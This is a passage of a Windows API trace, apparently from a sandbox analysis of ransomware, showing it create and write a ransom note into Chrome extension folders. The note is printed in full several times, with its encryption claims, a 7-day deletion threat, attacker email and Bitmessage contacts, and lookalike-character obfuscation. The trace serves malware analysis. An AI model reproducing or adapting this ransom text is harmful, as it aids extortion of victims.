m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÞ£ùÞ\x89[¡\x80µP£(£É\x99É\x94\x0fLêì\x9fî3?", lpUsedDefaultChar=0x0) returned 8717 [0283.707] WriteFile (in: hFile=0x2cc, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0283.708] CloseHandle (hObject=0x2cc) returned 1 [0283.708] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0283.708] GetLastError () returned 0x2 [0283.708] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0283.709] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.709] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0283.709] WideCharToMultiByte (in: 